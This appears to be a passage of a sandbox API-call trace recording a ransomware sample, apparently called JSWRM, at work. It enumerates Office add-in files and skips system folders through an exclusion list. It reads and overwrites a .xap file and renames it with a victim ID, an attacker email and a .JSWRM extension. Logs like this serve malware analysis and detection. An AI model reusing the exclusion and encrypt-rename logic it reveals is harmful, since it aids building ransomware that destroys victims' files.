[0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.126] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0125.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0125.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0125.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0125.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0125.127] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x29f7370, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x29f7370, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f5480d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.127] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0125.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0125.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0125.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.128] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0125.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0125.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0125.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0125.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.128] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf475131d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.128] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0125.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0125.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0125.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0125.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0125.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.129] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15be380c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d14b21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f3b2, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.pt-PT.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2=".") returned 1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="..") returned 1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="...") returned 1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="windows") returned -1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="recovery") returned -1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="perflogs") returned 1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="documents and settings") returned 1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="system volume information") returned -1 [0125.129] lstrcmpiW (lpString1="PowerViewRes.pt-PT.xap", lpString2="msocache") returned 1 [0125.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt-PT.xap", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0125.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0125.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt-PT.xap", cchWideChar=22, lpMultiByteStr=0x241178, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.pt-PT.xap", lpUsedDefaultChar=0x0) returned 22 [0125.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt-PT.xap", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0125.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pt-PT.xap", cchWideChar=22, lpMultiByteStr=0x240ef8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.pt-PT.xap", lpUsedDefaultChar=0x0) returned 22 [0125.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0125.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0125.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0125.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\PowerViewRes.pt-PT.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt-pt\\powerviewres.pt-pt.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.131] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=324530) returned 1 [0125.131] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0125.131] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.144] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.145] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0125.145] CloseHandle (hObject=0x338) returned 1 [0125.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0125.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0125.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0125.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247c78 [0125.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0125.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0125.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\PowerViewRes.pt-PT.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt-pt\\powerviewres.pt-pt.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt-PT\\PowerViewRes.pt-PT.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt-pt\\powerviewres.pt-pt.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0125.147] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15be380c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d14b21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f3b2, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.pt-PT.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.147] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0125.147] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6ac83cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0125.147] lstrcmpiW (lpString1="ro", lpString2=".") returned 1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="..") returned 1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="...") returned 1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="windows") returned -1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="recovery") returned 1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="perflogs") returned 1 [0125.147] lstrcmpiW 